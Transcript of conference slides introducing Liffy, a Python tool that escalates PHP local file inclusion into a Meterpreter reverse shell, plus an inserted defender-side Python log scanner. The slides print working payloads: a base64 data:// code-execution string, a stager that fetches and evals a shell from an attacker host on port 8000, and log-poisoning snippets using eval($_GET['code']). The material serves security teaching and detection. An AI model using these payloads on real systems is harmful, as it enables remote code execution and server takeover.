From Ashy To Classy | LFI Exploitation with Liffy


Transcript of From Ashy To Classy | LFI Exploitation with Liffy

Page 1

From Ashy To Classy

LFI Exploitation with Liffy

Page 2

Agenda

File Inclusion Vulnerability History and Overview

Liffy Introduction

Techniques

Considerations

Future Development

Page 3

#whoami

Application Security Practice Manager @VerSprite – We love product security!

I <3 Python and Java

Enterprise WebApp Background

CTF player and boot2rooter

Twitters: @rotlogix

Personal Blog: http://rotlogix.com

Page 4

LFI History and Overview

What is it?

“The process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application.” – https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion

Issues with include() and require() > untrusted code evaluation

Example:

<?php include($_GET['file']); ?> = http://target/find.php?file=/etc/passwd

<?php include("files/".$_GET['file'].".php"); ?> = Requires traversal “../../ “ and null byte %00

The problem is passing a URL parameter which is user controlled as the file argument for an include or require statement.

Page 5

LFI History and Overview

GitHub LULZ

Page 6

LFI History and Overview

File Inclusion Vulnerabilities have been around forever! 2002?

Around 340 “Inclusion” related entries on Exploit-DB over the last 5 years

Vulnerability dropped from OWASP Top 10 in 2010

My Opinion? Doesn’t matter.

Consider all the legacy applications written in PHP, and plugin development for things like WordPress

Page 7

Liffy Introduction

A tool that attempts to take a seemingly “read-only” LFI vulnerability into a full blown PHP Meterpreter web shell

Developed in Python

Currently has 10 features, which we will discuss

Uses Python’s SimpleHTTPServer library to spawn a web server as needed for payload staging

Major enhancements added by Dan ‘unicornFurnace’ Crowley @SpiderLabs

Page 8

Liffy Feature Overview

data:// – stream wrapper (code execution)

php://input – stream wrapper (code execution)

php://filter – stream wrapper (file reads)

php://expect – process control extension (code execution)

/proc/self/environ – CGI mode (code execution)

Apache access log poisoning (code execution)

Linux auth log poisoning (code execution)

Support for absolute and relative paths (log poisoning)

Support for cookies

Direct or staged payload delivery

Page 9

Payload Generation

Leverages msfpayload

PHP Meterpreter Reverse TCP

Liffy allows you to specify your own LHOST and LPORT for the Meterpreter

Creates corresponding resource file which loads a multi-handler

Page 10

Direct & Staged Payloads

This simply means directly executing your payload, or using additional code to download and execute your payload through the chosen technique (data://, php://input, etc)

Staged Delivery:

Generate PHP Meterpreter through msfpayload (Stored: /tmp/{random}.php)

Encode and use "<?php eval(file_get_contents('http://local:8000/{random}.php'))?>"

Spawn temporary web server to host shell out of /tmp directory

Stager downloads and executes shell

Listening handler catches reverse shell

Direct Delivery:

Generate PHP Meterpreter through msfpayload (Stored: /tmp/{random}.php)

Read payload from stored file (/tmp/{random}.php)

Encode and send directly through wrapper – data://text/html;base64,{payload}

Listening handler catches reverse shell

Page 11

Techniques: data://

RFC 2397 – data URL scheme

“ Allows the inclusion of small data items as “immediate” data, as if it had been included externally”

Stream wrapper supported since PHP 5.2.0

Usage: data://text/html;base64,{encoded code here}

Restricted by allow_url_include (enabled / disabled)

Set in php.ini

If enabled you would potentially have an RFI as well

“ Allows the use of URL-aware file open wrappers with functions like include”

Page 12

Techniques: data://

How do we use this?

http://target.com/lfi.php?file=data://text/html;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4=

<?php system('whoami'); ?> = PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4=

Page 13

Techniques: data://

How does Liffy use this?

Non-Staged:

Generate payload with msfpayload and resource file

Read payload from generated file

Encode the payload

Load listening handler for reverse connections

Deliver it directly: data://text/html;base64,{payload}

Staged:

Generate payload with msfpayload and resource file

Encode <?php eval(file_get_contents('http://attacker:8000/{shell}.php'))?>

Load listening handler for reverse connections

Spawn web server to host payload

Execute

Page 14

Techniques: data:// > DEMO!

Page 15

Techniques: php://input

Read-only stream wrapper

Used in POST requests, allows you to read the response data

Restricted by allow_url_include

Example:

Page 16

Techniques: php://input

How does Liffy implement this technique?

Exactly the same as data://

Staged and Non-Staged Approach

Really you should always choose Non-Staged in this scenario

POST (direct delivery) = Non-Staged

Page 17

Techniques: php://input > DEMO!

Page 18

Techniques: SSH auth.log Poisoning

Assumes you can include the SSH auth.log

If you can, there is usually a misconfiguration issue!

The process of injecting PHP code through failed login attempts

Code now appears in the auth.log

Include auth.log for code execution!


Page 20

Techniques: SSH auth.log Poisoning

Liffy implements this by creating a payload through msfpayload

Reads the PHP payload and assigns it to “payload_1”

Uses <?php eval($_GET['code'])?> as “payload_2”

The second payload is used to poison the auth.log

The first payload is what is called after the final inclusion “&code=“

Supports path traversal sequences if needed > “../, ..\\, /../ “

Page 21

Techniques: SSH auth.log Poisoning > DEMO!

Page 22

Techniques: Apache access.log Poisoning

Requires being able to include the access.log, which means you might have to ../../../ (/var/log/apache2/access.log)

Poison logs through the User-Agent by injecting PHP code

Include the access.log and your PHP code gets evaluated

Page 23

Techniques: Apache access.log Poisoning

Unless the log location is different (you should know this), Liffy defaults to the most common location

Supports path traversal as we already saw with the auth.log

Payload creation is the same, but with only direct delivery

Encodes the payload in base64 and uses eval(base64_decode()); to get around double or single quotes causing parse errors

Again everything gets delivered through the User-Agent

Page 24

Techniques: Apache access.log Poisoning > DEMO!

Page 25

Techniques: php://filter

Wrapper that permits applying filters to a stream when it is opened

Takes a resource argument, which is what you want to read

Used in conjunction with base64 encoding “Conversion Filter”

Takes the resource > streams and reads the data > converts to base64 > output is a base64 encoded string

Example:

http://target.com/vuln/lfi.php?file=php://filter/convert.base64-encode/resource=lfi.php
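As an added defender-side example (not part of the deck and not Liffy code), the following Python scans Apache access-log lines for the request patterns the stream-wrapper, log-poisoning and php://filter slides describe: a php://, data:// or expect:// wrapper in a parameter, traversal sequences, attempts to include auth.log, access.log or /proc/self/environ, and a PHP open tag in the User-Agent (the access.log poisoning vector). The log lines, IPs and timestamps are constructed; the only payload in them is the whoami snippet from the slides.

```python
import re
import base64
from urllib.parse import unquote

# Constructed Apache "combined"-format sample (not a real server); data:// body and User-Agent hold the slides' whoami snippet.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2015:10:01:02 +0000] "GET /lfi.php?file=about.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2015:10:01:09 +0000] "GET /lfi.php?file=php://filter/convert.base64-encode/resource=lfi.php HTTP/1.1" 200 988 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2015:10:01:12 +0000] "GET /lfi.php?file=data://text/html;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4= HTTP/1.1" 200 41 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2015:10:01:15 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "<?php system('whoami'); ?>"
10.0.0.9 - - [10/Mar/2015:10:01:18 +0000] "GET /lfi.php?file=../../../../var/log/apache2/access.log HTTP/1.1" 200 65536 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d+ \S+ "[^"]*" "(?P<ua>[^"]*)"$')
WRAPPER_RE = re.compile(r'^(php|data|expect)://', re.I)        # php://input, php://filter, data://, expect://
TRAVERSAL_RE = re.compile(r'\.\./|\.\.\\|%2e%2e', re.I)         # ../  ..\  and a still-encoded (double-encoded) form
LOG_TARGET_RE = re.compile(r'/(auth\.log|access\.log|proc/self/environ)\b', re.I)
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.I)                    # a PHP open tag where no code belongs

def parse_query(target):
    # '/p?a=b&c=d' -> {'a': 'b', 'c': 'd'}; only the first '=' in a pair separates name from value
    pairs = (p.partition('=') for p in target.partition('?')[2].split('&') if p)
    return {unquote(k): unquote(v) for k, _, v in pairs}

def data_uri_body(value):
    # decoded base64 body of a data: URI; b'' when the value is not one or the base64 is malformed
    head, sep, body = value.partition(';base64,')
    if not (sep and head.lower().startswith('data:')):
        return b''
    try:
        return base64.b64decode(body, validate=True)
    except ValueError:
        return b''

def classify_request(target, user_agent):
    """Return LFI-related findings for one request (empty list means nothing suspicious)."""
    findings = []
    for name, value in parse_query(target).items():
        if WRAPPER_RE.search(value):
            findings.append('stream-wrapper in ' + name)
        if PHP_TAG_RE.search(data_uri_body(value).decode('latin-1')):
            findings.append('php-code-in-data-uri in ' + name)   # inline code carried by data://
        if TRAVERSAL_RE.search(value):
            findings.append('path-traversal in ' + name)
        if LOG_TARGET_RE.search(value):
            findings.append('log-or-environ-include in ' + name)  # the included file is a log
    if PHP_TAG_RE.search(user_agent):
        findings.append('php-code-in-user-agent')                  # how access.log gets poisoned
    return findings

def scan_log(text):
    # (client ip, request target, findings) for every log line that raises at least one finding
    matches = filter(None, map(LOG_RE.match, text.splitlines()))
    hits = ((m['ip'], m['target'], classify_request(m['target'], m['ua'])) for m in matches)
    return [h for h in hits if h[2]]
```

Running scan_log over SAMPLE_LOG flags four of the five lines, all from the same client, which is the kind of clustering worth alerting on.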

Page 26

Techniques: php://filter

Liffy automates this for you!

Prompts you for a file that you want to read

Decodes the encoded string and echoes the contents back to the terminal

Useful for viewing PHP source from files you have access to

Page 27

Techniques: php://filter > DEMO!

Page 28

Future Work

Make the internal web server smarter and more reliable

Better Object Oriented design

Re-write the command-line interface

Dynamic request object building and re-use for everything HTTP

Support bypassing filters for path traversals

Write custom PHP reverse shell with built-in handler

Page 29